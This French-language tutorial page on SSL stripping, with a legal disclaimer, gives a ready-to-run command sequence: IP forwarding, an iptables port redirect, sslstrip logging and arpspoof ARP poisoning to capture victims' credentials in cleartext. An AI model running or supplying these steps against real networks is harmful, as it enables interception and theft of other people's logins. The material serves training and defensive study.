Ssl stripping
🔒 Contenu de sécurité — usage encadré
Cette page décrit l'attaque SSLstrip (interception sur réseau local) à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).
Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.
| Fiche express | |
|---|---|
| Technique | MITM — rétrogradation HTTPS → HTTP |
| Outils | sslstrip, arpspoof |
| Voir aussi | Hijacking |
Le SSL stripping est une attaque MITM qui intercepte le trafic d'une victime et rétrograde ses connexions HTTPS en HTTP, permettant de lire en clair les identifiants transmis.
Mise en œuvre
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 54321
locate sslstrip
cd /pentest/web/sslstrip/
python sslstrip.py --help
python sslstrip.py -p -l 54321
tail -f sslstrip.log
# empoisonner l'ARP entre la victime et la passerelle
ifconfig
arpspoof -i eth0 -t 192.168.0.1 192.168.0.<My>
Lorsque le client accède à une page « HTTPS », la log récupère les informations transmises.
Voir aussi
- Hijacking · Subterfuge — autres attaques MITM